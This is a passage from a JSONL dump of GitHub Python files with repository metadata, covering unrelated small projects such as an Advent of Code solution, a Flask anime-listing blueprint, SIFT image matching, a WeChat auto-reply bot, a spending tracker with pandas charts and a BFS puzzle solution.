bytes\n \n def recognize_face(self, face_descriptor, threshold = 0.7):\n distances = np.linalg.norm(self.descriptors - face_descriptor, axis=1)\n argmin = np.argmin(distances)\n min_dist = distances[argmin]\n if min_dist > (1 - threshold):\n name = \"unknown\"\n else:\n name = self.labels[argmin]\n print(name,\"@\",str(int(100.0*(1-min_dist))) + \"%\")\n return name","repo_name":"hopkira/coral-dalek","sub_path":"recognizer.py","file_name":"recognizer.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42186558538","text":"from utility import parseInputDay5\nfrom typing import List\n\nclass Solution:\n\n def stack_crate_operator(self, use_real_input: bool = False, second_problem: bool = False) -> str:\n \"\"\"\n Returns a str of the top letters of each stack of boxes\n :param use_real_input: bool. Use real data if True, else test data\n :param second_problem: bool. If True then return answer for second part\n :return: str. 
Str containing the letters of the top of each stack\n \"\"\"\n res = \"\"\n # O(N) time, O(N) space where N is the number of lines\n stacks, instructions = parseInputDay5(\"test.txt\") if not use_real_input else parseInputDay5(\"real.txt\")\n\n # O(N) time where N is the number of lines for instructions\n for instruction in instructions:\n # Move M number of boxes from one stack to another\n tmp_stack: List[str] = []\n for _ in range(instruction[2]):\n tmp_stack.append(stacks[instruction[0] - 1].pop())\n if second_problem:\n # In second problem, just reverse the stack we are popping from\n tmp_stack = tmp_stack[::-1]\n stacks[instruction[1] - 1].extend(tmp_stack)\n # Finally, pop the top of each stack to our res:\n for stack in stacks:\n res += stack.pop()\n return res\n\nrun = Solution()\nprint(run.stack_crate_operator(True, False))\nprint(run.stack_crate_operator(True, True))\n","repo_name":"gyao852/adventOfCode2022","sub_path":"day5/day5.py","file_name":"day5.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72040231527","text":"#!/usr/bin/env python3\n\nimport jug\nimport subprocess\nfrom pathlib import Path\nimport sys\nimport os\n\nexperiments_dir = Path(__file__).parent.parent\n\n@jug.TaskGenerator\ndef train_sgd(log_dir, **config):\n os.makedirs(log_dir, exist_ok=False)\n\n script = experiments_dir / \"train_sgd.py\"\n args = [\"nice\", \"-n19\", sys.executable, script,\n *[f\"--{k}={v}\" for k, v in config.items()]]\n print(f\"Running in cwd={log_dir} \" + \" \".join(map(repr, args)))\n complete = subprocess.run(args, cwd=log_dir)\n if complete.returncode != 0:\n raise SystemError(f\"Process returned with code {complete.returncode}\")\n return complete\n\nbase_dir = experiments_dir.parent/\"logs/sgd-no-weight-decay\"\njug.set_jugdir(str(base_dir/\"jugdir\"))\nfor net in [\"dense\", \"conv\"]:\n\n for i in reversed(range(10)):\n log_dir = base_dir/f\"mnist_classification{net}net\"/str(i)\n print(log_dir)\n if net == \"dense\":\n train_sgd(str(log_dir), model=\"classificationdensenet\", data=\"mnist\", width=100)\n elif net == \"conv\":\n train_sgd(str(log_dir), model=\"classificationconvnet\", data=\"mnist\", width=64)\n else:\n raise ValueError(net)\n","repo_name":"ratschlab/bnn_priors","sub_path":"experiments/jug/0_12_mnist_no_weight_decay.py","file_name":"0_12_mnist_no_weight_decay.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"53"} +{"seq_id":"38277466615","text":"import numpy as np\nimport time\nimport sys\n\ndef progress_bar(done, total, message):\n sys.stdout.flush()\n sys.stdout.write('\\r')\n progress = (done/np.double(total))\n sys.stdout.write(\"%s: [%-20s] %d%%\" % (message, '='*np.int(progress*20), np.int(progress*100)))\n sys.stdout.flush()\n\nif __name__==\"__main__\":\n for ind, item in enumerate(range(200)):\n time.sleep(0.01)\n progress_bar(ind, 200, 'Testing:')\n","repo_name":"sjara/jaratest","sub_path":"nick/utils/progressbar.py","file_name":"progressbar.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"25420783771","text":"import json\nimport requests\nfrom flask import Flask, render_template,request\nfrom flask import Blueprint\n\nmostPopular = Blueprint('mostPopular', __name__)\n\n@mostPopular.route('/MostPopular/<page>')\ndef mostPopularfun(page):\n page = 
int(page)\n try:\n mostPop = requests.get('https://api.jikan.moe/v3/top/anime/{}/bypopularity'.format(page)).json()['top']\n if mostPop:\n return render_template('mostPop.html', data = mostPop, nextPage = page+1, title = \"MostPopular\") \n else:\n raise Exception()\n except:\n return render_template('NoResult.html',title ='No Result')","repo_name":"Kaemaros/SWU-CP353WebTechnology2-2019-Midterm-project","sub_path":"blueprints/mostPopular.py","file_name":"mostPopular.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39387083543","text":"import json\nimport pathlib\n\nfrom domain.book import BookDecoder, BookEncoder\nfrom repository.generic_repo import GenericRepository\n\n\nclass JsonRepository(GenericRepository):\n\n def __init__(self, file_name):\n super().__init__()\n self.__file_name = file_name\n\n def load(self):\n abspath = pathlib.Path(self.__file_name).absolute()\n with open(self.__file_name, 'r') as f:\n try:\n data = json.load(f)\n for d in data:\n book = json.loads(d, cls=BookDecoder)\n self._all_books[book.isbn] = book\n except Exception as e:\n print(e)\n f.close()\n\n def save(self):\n abspath = pathlib.Path(self.__file_name).absolute()\n with open(self.__file_name, 'w') as f:\n all_books_json = []\n for book in self._all_books.values():\n all_books_json.append(json.dumps(book, cls=BookEncoder))\n json.dump(all_books_json, f)\n f.close()\n","repo_name":"IoanaGabor/University","sub_path":"Semester-1/Fundamentals Of Programming/assignments/a7-913-Gabor-Ioana/src/repository/json_repository.py","file_name":"json_repository.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11323015629","text":"import math\n\ndef f(a,b,c):\n return math.sin(a*b*c)**2/(a*a+b*b+c*c)\n\ndef main():\n s = float(input('s= '))\n t = float(input('t= '))\n p=(f(1,t*t,s)+f(t,s*s,1))/(1+f(1,t*s,1)**2)\n print(p)\n\nif __name__ == '__main__':\n main()\n","repo_name":"DoNjOnIn/5.1","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1777859938","text":"import random\nimport re\n\nSECURE = True\n\nzwischenPattern = re.compile(r'.*(von|zwischen) (-?\\d+) (und|bis) (-?\\d+).*', re.I)\nbisPattern = re.compile(r'.*(bis|kleiner gleich) (-?\\d+).*', re.I)\nkleinerPattern = re.compile(r'.*(unter|kleiner) (als)? 
(-?\d+).*', re.I)\n\ndef output(txt, tiane):\n output = ''\n tt = txt.replace('.', (''))\n tt = tt.replace('?', (''))\n tt = tt.replace('!', (''))\n tt = tt.replace('.', (''))\n tt = tt.replace(',', (''))\n tt = tt.replace('\"', (''))\n tt = tt.replace('(', (''))\n tt = tt.replace(')', (''))\n tt = tt.replace('€', ('Euro'))\n tt = tt.replace('%', ('Prozent'))\n tt = tt.replace('$', ('Dollar'))\n text = tt.lower()\n t = str.split(text)\n if 'münze' in text or ('kopf' in text and 'oder' in text and 'zahl' in text):\n q = random.randint(1,2)\n if q == 1:\n output = 'kopf'\n else:\n output = 'zahl'\n elif 'würfel' in text or 'alea iacta est' in text:\n q = random.randint(1,6)\n if q == 1:\n output = 'eins'\n elif q == 2:\n output = 'zwei'\n elif q == 3:\n output = 'drei'\n elif q == 4:\n output = 'vier'\n elif q == 5:\n output = 'fünf'\n else:\n output = 'sechs'\n elif (('zufall' in text or 'zufällig' in text) and 'zahl' in text):\n try:\n match = zwischenPattern.match(text)\n if (output == '' and match is not None):\n if (int(match.group(2)) < int(match.group(4))):\n output = str(random.randint(int(match.group(2)), int(match.group(4))))\n else:\n output = str(random.randint(int(match.group(4)), int(match.group(2))))\n match = bisPattern.match(text)\n if (output == '' and match is not None):\n if (int(match.group(2)) > 0):\n output = str(random.randint(1, int(match.group(2))))\n else:\n output = str(random.randint(int(match.group(2)), 1))\n match = kleinerPattern.match(text)\n if (output == '' and match is not None):\n if (int(match.group(3)) > 0):\n output = str(random.randrange(1, int(match.group(3))))\n else:\n output = str(random.randrange(int(match.group(3)), 1))\n except ValueError:\n output = ''\n if (output == ''):\n output = str(random.randint(1,100))\n return output\n\ndef handle(text, tiane, profile):\n ausgabe = output(text, tiane).strip()\n if (ausgabe.startswith('-')):\n ausgabe = 'minus ' + ausgabe[1:]\n tiane.say(ausgabe)\n\ndef isValid(txt):\n tt = txt.replace('.', (''))\n tt = tt.replace('?', (''))\n tt = tt.replace('!', (''))\n tt = tt.replace('.', (''))\n tt = tt.replace(',', (''))\n tt = tt.replace('\"', (''))\n tt = tt.replace('(', (''))\n tt = tt.replace(')', (''))\n tt = tt.replace('€', ('Euro'))\n tt = tt.replace('%', ('Prozent'))\n tt = tt.replace('$', ('Dollar'))\n text = tt.lower()\n if 'münze' in text or ('kopf' in text and 'oder' in text and 'zahl' in text) or 'würfel' in text or (('zufall' in text or 'zufällig' in text) and 'zahl' in text):\n return True\n\nclass Tiane:\n def __init__(self):\n self.local_storage = {}\n self.user = 'Baum'\n self.analysis = {'room': 'None', 'time': {'month': '08', 'hour': '06', 'year': '2018', 'minute': '00', 'day': '27'}, 'town': 'None'}\n\n def say(self, text):\n print (text)\n def listen(self):\n neuertext = input()\n return neuertext\n\ndef main():\n profile = {}\n tiane = Tiane()\n handle('Tiane wirf einen würfel', tiane, profile)\n\nif __name__ == '__main__':\n main()\n","repo_name":"FerdiKr/TIANE","sub_path":"server/modules/randomizer.py","file_name":"randomizer.py","file_ext":"py","file_size_in_byte":3787,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"53"} +{"seq_id":"42875663901","text":"import itchat\n\nitchat.auto_login()\n\n@itchat.msg_register([itchat.content.TEXT])\ndef text_reply(msg):\n# print(msg)\n nickName = itchat.search_friends(userName=msg['FromUserName'])['NickName']\n if nickName == '张芮溟' or nickName == 'No. 
L':\n itchat.send(('鸡年大吉'), msg['FromUserName'])\n\nitchat.run()\n","repo_name":"freealong/WeChatRobot","sub_path":"AutoReply.py","file_name":"AutoReply.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"10289536528","text":"import numpy as np\nimport cv2 as cv\nfrom matplotlib import pyplot as plt\nfrom skimage import io\nimport time\n\ndef resizing_img(img_para):\n height, width = img_para.shape[:2]\n thumbnail = cv.resize(img_para, (round(width/5), round(height/5)), interpolation = cv.INTER_AREA)\n return thumbnail\n\n\ndef matching_sift(query_img, train_img):\n MIN_MATCH_COUNT = 10\n img1 = query_img # queryImage\n img2 = io.imread(train_img) # trainImage\n img1 = resizing_img(img1)\n img2 = resizing_img(img2)\n\n try:\n w, h, c = img2.shape\n gray1 = cv.cvtColor(img1, cv.COLOR_BGR2GRAY)\n gray2 = cv.cvtColor(img2, cv.COLOR_BGR2GRAY)\n except ValueError as e :\n\n gray1 = cv.cvtColor(img1, cv.COLOR_BGR2GRAY)\n gray2 = img2\n\n\n # Initiate SIFT detector\n sift = cv.xfeatures2d.SIFT_create()\n # find the keypoints and descriptors with SIFT\n kp1, des1 = sift.detectAndCompute(gray1,None)\n kp2, des2 = sift.detectAndCompute(gray2,None)\n FLANN_INDEX_KDTREE = 1\n index_params = dict(algorithm = FLANN_INDEX_KDTREE, trees = 5)\n search_params = dict(checks = 50)\n flann = cv.FlannBasedMatcher(index_params, search_params)\n matches = flann.knnMatch(des1,des2,k=2)\n # store all the good matches as per Lowe's ratio test.\n good = []\n for m,n in matches:\n if m.distance < 0.7*n.distance:\n good.append(m)\n\n if len(good) > MIN_MATCH_COUNT:\n src_pts = np.float32([kp1[m.queryIdx].pt for m in good]).reshape(-1, 1, 2)\n dst_pts = np.float32([kp2[m.trainIdx].pt for m in good]).reshape(-1, 1, 2)\n M, mask = cv.findHomography(src_pts, dst_pts, cv.RANSAC, 5.0)\n matchesMask = mask.ravel().tolist()\n h, w, d = img1.shape\n pts = np.float32([[0, 0], [0, h - 1], [w - 1, h - 1], [w - 1, 0]]).reshape(-1, 1, 2)\n dst = cv.perspectiveTransform(pts, M)\n img2 = cv.polylines(img2, [np.int32(dst)], True, 255, 3, cv.LINE_AA)\n else:\n # print(\"Not enough matches are found - {}/{}\".format(len(good), MIN_MATCH_COUNT))\n matchesMask = None\n\n # if len(good) > 50:\n # draw_params = dict(matchColor = (0,255,0), # draw matches in green color\n # singlePointColor = None,\n # matchesMask = matchesMask, # draw only inliers\n # flags = 2)\n # img3 = cv.drawMatches(img1, kp1, img2, kp2, good, None, **draw_params)\n # return len(good)\n # else:\n return len(good)\n\n\nstart_time = time.time()\n\ninput_img = io.imread(\"img/g_pic.jpeg\")\nimg_list = ['img/r2.jpg','img/r3.jpg','img/r6.jpg','img/r7.jpg','img/r8.jpg','img/r14.jpg','img/r15.jpg','img/r16.jpg','img/r17.jpg','img/r19.jpg','img/r20.jpg','img/r1.jpg','img/g1.jpeg','img/low8.jpeg','img/low7.jpeg','img/low5.jpeg','img/g6.png','img/g7.jpeg','img/g8.jpeg','img/g9.jpeg','img/low4.jpeg',\"img/g_pic2.jpg\"]\nprint(\"list length is \"+str(len(img_list)))\nresult = []\n\nfor t_img in img_list:\n result.append(matching_sift(input_img, t_img))\n\nprint(\"result\")\ni = max(result)\nprint(i)\ni = result.index(i)\nprint(img_list[i])\n\nprint(\"--- %s seconds ---\" % (time.time() - start_time))","repo_name":"ngost/Repeat_Image_Detector","sub_path":"root/sift_matching_example.py","file_name":"sift_matching_example.py","file_ext":"py","file_size_in_byte":3204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 
+{"seq_id":"16747666894","text":"\"\"\"Update Reservation model\n\nRevision ID: 1932d1816dbb\nRevises: 8a02e178fd18\nCreate Date: 2016-01-12 13:09:41.079367\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '1932d1816dbb'\ndown_revision = '8a02e178fd18'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.add_column('Reservations', sa.Column('paid', sa.Integer(), nullable=True))\n op.add_column('Reservations', sa.Column('reason', sa.String(300), nullable=True))\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('Reservations', 'reason')\n op.drop_column('Reservations', 'paid')\n ### end Alembic commands ###\n","repo_name":"mbtronics/BAB","sub_path":"migrations/versions/1932d1816dbb_update_reservation_model.py","file_name":"1932d1816dbb_update_reservation_model.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"37937773477","text":"from random import choice\r\n\r\nquestions = [\"Why is the earth round?: \", \"Why is the sun so bright?: \", \"Why is the sky blue?: \"]\r\n\r\nquestion = choice(questions)\r\nanswer = input(question).strip().lower()\r\n\r\nwhile answer != \"just because\":\r\n answer = input(\"why?: \").strip().lower()\r\n \r\n \r\nprint(\"Oh.....Okay.\")\r\n","repo_name":"akaif95/BabyQuestions","sub_path":"baby.py","file_name":"baby.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39908306009","text":"import os\n\nimport numpy as np\nfrom scipy.io import wavfile\nimport math\n\nfrom random import randint\n\ndef get_audio_files(directory):\n files = []\n for dirname, dirnames, filenames in os.walk(directory):\n for filename in filenames:\n if '.wav' in filename:\n files.append(os.path.abspath(os.path.join(dirname, filename)))\n return files\n\n\ndef avg_audio(paths, out, duration):\n shortest = math.inf\n wavfiles = []\n rate = None\n for path in paths:\n fs, data = wavfile.read(path)\n rate = fs\n track = data.T[0]\n size = len(track)\n shortest = size if size < shortest else shortest\n wavfiles.append(track)\n\n num_tracks = len(wavfiles)\n chunk = rate * duration\n avg = np.zeros(chunk)\n for track in wavfiles:\n index = randint(0, shortest - chunk)\n track = track[index:index+chunk]\n avg = avg + track / num_tracks\n\n wavfile.write(out, rate, avg)\n\nDURATION = {\n 'short': '-d',\n 'verbose': '--duration',\n 'help': 'length of the output in seconds',\n 'required': False,\n 'type': int\n}","repo_name":"rochester-rcl/dhsi-multimedia-examples","sub_path":"dhsi_multimedia/audio/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36053111057","text":"# Draw Board\n# Date - 16/09/2020\n\nimport pygame\npygame.init()\n\nclass DrawChessBoard():\n def __init__(self, gamePosition): \n import pygame\n import collections\n import os\n pygame.init()\n\n boardSize=(640, 640)\n mainBoard = pygame.display.set_mode(size=boardSize)\n boardImg = pygame.image.load(os.path.join('sprites', 'myboard.png')).convert_alpha()\n boardImg = pygame.transform.scale(boardImg, (640, 640))\n peiceImg = pygame.image.load(os.path.join('sprites', 'peicesImg.png')).convert_alpha()\n 
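# 480x160 is a 6x2 grid of 80 px tiles, matching the 80 px squares of the scaled 640x640 board\n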
        peiceImg = pygame.transform.scale(peiceImg, (480, 160))\n\n        mainBoard.blit(boardImg, (0, 0))\n        mainBoard.blit(peiceImg, (0, 0), (0, 0, 480, 480))  # area rect is (left, top, width, height); pygame clips it to the 480x160 sheet\n        pygame.display.update()\n\n\nDrawChessBoard(0)  # draw the board once; creating it inside the loop below reloaded the sprites on every frame\n\nrun = True\nwhile run:\n    for event in pygame.event.get():\n        if event.type == pygame.QUIT:\n            run = False\n","repo_name":"sarang323patil/chess","sub_path":"drawBoard.py","file_name":"drawBoard.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14218660713","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\nclass Graph:\n    \"\"\"Displays the user's spendings.\n\n    Attributes:\n        purchase_data (dataframe): a dataframe that stores the user's spendings.\n    \"\"\"\n    def open_file(self, purchase_data):\n        \"\"\"Opens a CSV file and turns it into a dataframe.\n\n        Args:\n            purchase_data: path to a CSV file of the user's spendings.\n\n        Returns:\n            A dataframe for the given CSV file.\n        \"\"\"\n        purchase_data = pd.read_csv(purchase_data)  # read the file that was passed in, not a hardcoded name\n        self.purchase_data = purchase_data\n        print(purchase_data)\n        return purchase_data\n\n    def graph(self):\n        \"\"\"Creates a time series graph of the stored purchase data.\n\n        Returns:\n            A time series graph for all purchases that have been made.\n\n        Source:\n            I used information from pandas.pydata.org to develop the code for\n            the time series graph below, mainly the general layout of plot(),\n            because at the time of writing this code I did not know how to use\n            plot(). I chose this source because I was trying to plot data from\n            a dataframe. My modifications were changing the x and y values and\n            adding a marker, a title, and other touches to make the graph more\n            visually appealing.\n\n            https://pandas.pydata.org/pandas-docs/version/0.23/generated/pandas.DataFrame.plot.html\n        \"\"\"\n        self.purchase_data.plot(kind='line',\n                                x='Date',\n                                y='Cost',\n                                color='blue',\n                                marker='o')\n        plt.title('Purchases Over Time')\n        plt.xlabel('Date')\n        plt.ylabel('Cost in $')\n        plt.grid(True)\n        plt.show()\n\n    def avg_pie(self):\n        \"\"\"Creates a new dataframe and a pie graph for the average of each item\n        type given in the data.\n\n        Returns:\n            A new dataframe and pie chart for the average percentage spent\n            on each item type.\n\n        Source:\n            I used information from pandas.pydata.org to develop the pie graph\n            below. Since I had the general structure from the graph method, all\n            I had to do was set kind='pie'. For the other parameters, such as\n            autopct and explode, I used matplotlib.org: autopct displays the\n            percentages on each slice, and explode makes the chart more\n            visually appealing. 
The modifications I made were setting the plot kind to pie,\n            adding a specific figure size, and changing the startangle.\n\n            https://matplotlib.org/stable/gallery/pie_and_polar_charts/pie_features.html\n        \"\"\"\n        avg = self.purchase_data.groupby(\"Item type\")[\"Cost\"].mean()\n        avg.plot(\n            kind='pie', autopct='%1.1f%%', explode=[0.1] * avg.size,  # one wedge per category; a fixed 4-tuple crashes when the number of item types differs\n            title='Average Percentage Spent Per Item Type',\n            figsize=(7, 7),\n            startangle=90)\n        plt.show()\n\nclass Spending:\n    \"\"\"Records a user's spendings.\n\n    Attributes:\n        cost (list):\n            a list of the cost of the items that a user buys\n\n        item_type (list):\n            a list of the types of items a user spends their money on\n\n        item (list):\n            a list of the specific items a user buys\n\n        date (list):\n            a list of the dates that a user made their purchases\n    \"\"\"\n    def __init__(self, cost, item_type, item, date):\n        \"\"\"Initializes values.\n\n        Args:\n            cost (list):\n                a list of the cost of the items that a user buys\n\n            item_type (list):\n                a list of the types of items a user spends their money on\n\n            item (list):\n                a list of the specific items a user buys\n\n            date (list):\n                a list of the dates that a user made their purchases\n\n        Side effects:\n            initializes values\n        \"\"\"\n        self.item_type = list(item_type)\n        self.item = list(item)\n        self.cost = list(cost)\n        self.date = list(date)\n\n    def create_df(self):\n        \"\"\"Creates a dataframe of purchases.\n\n        Returns:\n            df: a dataframe of all the purchases made\n\n        Side effects:\n            creates self.df, which is initialized here and used in other methods\n        \"\"\"\n        data = {'Date': self.date, 'Item Type': self.item_type,\n                'Item': self.item, 'Cost': self.cost}\n        df = pd.DataFrame(data)\n        self.df = df\n        return df.to_string(index=False)\n\n    def file_commit(self, commit, file):\n        \"\"\"Appends the user-created dataframe to a CSV file.\n\n        Args:\n            commit (boolean): whether the purchases should be added to a file\n\n            file (string): a path to the file that the user may write to\n\n        Side effects:\n            Writes data to a file.\n        \"\"\"\n        if commit:\n            self.df.to_csv(file, mode='a', header=False, index=False)\n\n\ndate_list = []\nitem_type_list = []\nitem_list = []\ncost_list = []\ncounter = 0\n\nprint(\"Welcome to the input for your purchases. 
If you wish to stop making \" +\n      \"purchases at any time, you can enter 0 for the cost of the item.\")\nwhile True:\n    cost = float(input(\"How much did your item cost: \"))\n    if cost == 0:\n        break\n    cost_list.append(cost)\n    item_type = input(\"What kind of item did you buy (Food, Other, Utilities,\"\n                      + \" or Personal): \")\n    item_type_list.append(item_type)\n    item = input(\"What item did you buy: \")\n    item_list.append(item)\n    date = input(\"On what date did you make the purchase: \")\n    date_list.append(date)\n    counter += 1\n    user_data = Spending(cost_list, item_type_list, item_list, date_list)\n    print(user_data.create_df())\nif counter == 1:\n    print(f\"You have made {counter} purchase overall\")\nelse:\n    print(f\"You have made {counter} purchases overall\")\nif counter > 0:\n    commit = input(\"Would you like to commit to a file: \")\n    if commit == 'y':\n        user_data.file_commit(True, \"sample_data.csv\")\n    # graph from the CSV whether or not the new purchases were committed\n    graphing = Graph()\n    graphing.open_file(\"sample_data.csv\")\n    graphing.graph()\n    graphing.avg_pie()\n\nprint(\"Thank you for using the program!\")\n","repo_name":"edeng12/silver-chainsaw","sub_path":"spendings.py","file_name":"spendings.py","file_ext":"py","file_size_in_byte":7140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9055178811","text":"__version__ = '0.1.1'\n\nimport sys\n\n\ndef _index_of(lst, v):\n    try:\n        return lst.index(v)\n    except ValueError:\n        return -1\n\n\ndef has_flag(flag: str, argv=sys.argv) -> bool:\n    prefix = '' if flag.startswith('-') else ('-' if len(flag) == 1 else '--')\n    position = _index_of(argv, prefix + flag)\n    terminator_position = _index_of(argv, '--')\n    return position != -1 and (terminator_position == -1 or position < terminator_position)\n","repo_name":"shawwn/has-flag-python","sub_path":"has_flag/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13360502397","text":"import numpy as np\nimport torch\nimport cv2\n\ndef cam(x, image_size=256):\n    cam_img = np.interp(x, (x.min(), x.max()), (0, 255)).astype(np.uint8)\n    cam_img = cv2.resize(cam_img, (image_size, image_size))\n    cam_img = cv2.applyColorMap(cam_img, cv2.COLORMAP_JET)\n    return cam_img\n\n\ndef tensor2im(input_image, imtype=np.uint8, use_cam=False, image_size=256):\n    \"\"\"\n    Converts a Tensor array into a numpy image array.\n    :param input_image: (tensor) the input image tensor array\n    :param imtype: (type) the desired type of the converted numpy array\n    :return: the converted numpy image array\n    \"\"\"\n\n    if not isinstance(input_image, np.ndarray):\n        if isinstance(input_image, torch.Tensor):  # get the data from a variable\n            image_tensor = input_image.data\n        else:\n            return input_image\n        image_numpy = image_tensor[0].cpu().float().numpy()  # convert it into a numpy array\n        if image_numpy.shape[0] == 1:  # grayscale to RGB\n            image_numpy = np.tile(image_numpy, (3, 1, 1))\n\n        if use_cam:\n            image_numpy = cam(np.transpose(image_numpy, (1, 2, 0)), image_size)\n        else:\n            image_numpy = (np.transpose(image_numpy,\n                                        (1, 2, 0)) + 1) / 2.0 * 255.0  # post-processing: transpose and scaling\n    else:  # if it is a numpy array, do nothing\n        image_numpy = input_image\n    return 
image_numpy.astype(imtype)","repo_name":"jayzhan211/ImageT","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24737176757","text":"from collections import deque\n\nn, k = map(int, input().split())\nvisited = [-1] * 100001\n\nif n >= k:\n    print(n - k)\nelse:\n    queue = deque()\n    queue.append(n)\n    visited[n] = 0\n    while queue:\n        q = queue.popleft()\n        # teleporting to 2*q costs 0 seconds, so this needs 0-1 BFS: zero-cost\n        # moves go to the FRONT of the deque, and a node is re-queued whenever\n        # a shorter time is found (updating visited without re-queueing can\n        # leave stale times downstream)\n        if 0 < q * 2 <= 100000 and (visited[q * 2] == -1 or visited[q * 2] > visited[q]):\n            visited[q * 2] = visited[q]\n            queue.appendleft(q * 2)\n\n        for i in (q - 1, q + 1):\n            if 0 <= i <= 100000 and (visited[i] == -1 or visited[i] > visited[q] + 1):\n                visited[i] = visited[q] + 1\n                queue.append(i)\n\n    print(visited[k])\n\n# [Note]\n# how would you even think of this.....\n# def c(n, k):\n#     if n >= k:\n#         return n - k\n#     elif k == 1:\n#         return 1\n#     elif k % 2:  # if k is odd, always add 1 and take the minimum count of reaching n from k-1 and k+1\n#         return 1 + min(c(n, k - 1), c(n, k + 1))\n#     else:  # k % 2 == 0: dividing by 2 costs nothing, so take the minimum of 'reaching n from k//2' and 'stepping from k down to n by -1'\n#         return min(k - n, c(n, k // 2))\n# n, k = map(int, input().split())\n# print(c(n, k))\n","repo_name":"miseongk/Algorithm","sub_path":"BAEKJOON/Part/Part4/13549.py","file_name":"13549.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"18144465577","text":"# #box\n# import pandas as pd\n# import numpy as np\n# from sklearn.cluster import KMeans\n# import plotly.graph_objects as go\n\n# df = pd.read_csv('data/60Min.csv')\n# df['datetime'] = pd.to_datetime(df['datetime'])\n# df.set_index(['datetime'], inplace=True)\n# df = df.tail(500)\n# df_prices = np.array(df[\"close\"])\n\n# K = 9\n# kmeans = KMeans(n_clusters=6).fit(df_prices.reshape(-1, 1))\n# clusters = kmeans.predict(df_prices.reshape(-1, 1))\n\n# # Create list to hold values, initialized with infinite values\n# min_max_values = []\n# # init for each cluster group\n# for i in range(6):\n#     # Add values for which no price could be greater or less\n#     min_max_values.append([np.inf, -np.inf])\n# # Print initial values\n# print(min_max_values)\n# # Get min/max for each cluster\n# for i in range(len(df_prices)):\n#     # Get cluster assigned to price\n#     cluster = clusters[i]\n#     # Compare for min value\n#     if df_prices[i] < min_max_values[cluster][0]:\n#         min_max_values[cluster][0] = df_prices[i]\n#     # Compare for max value\n#     if df_prices[i] > min_max_values[cluster][1]:\n#         min_max_values[cluster][1] = df_prices[i]\n\n# print(\"Initial Min/Max Values:\\n\", min_max_values)\n# # Create container for combined values\n# output = []\n# # Sort based on cluster minimum\n# s = sorted(min_max_values, key=lambda x: x[0])\n# # For each cluster get average of\n# for i, (_min, _max) in enumerate(s):\n#     # Append min from first cluster\n#     if i == 0:\n#         output.append(_min)\n#     # Append max from last cluster\n#     if i == len(min_max_values) - 1:\n#         output.append(_max)\n#     # Append average from cluster and adjacent for all others\n#     else:\n#         output.append(sum([_max, s[i+1][0]]) / 2)\n\n# pd.options.plotting.backend = 'plotly'\n# colors = ['red', 'orange', 'yellow', 'green', 'blue', 'indigo']\n\n# fig = df.plot.scatter(\n#     x=df.index,\n#     y=\"close\",\n#     color=[colors[i] for i in clusters],\n# )\n\n# # Add horizontal lines\n# for cluster_avg in output[1:-1]:\n#     fig.add_hline(y=cluster_avg, line_width=1, line_color=\"blue\")\n    \n# # Add a trace of the price for better 
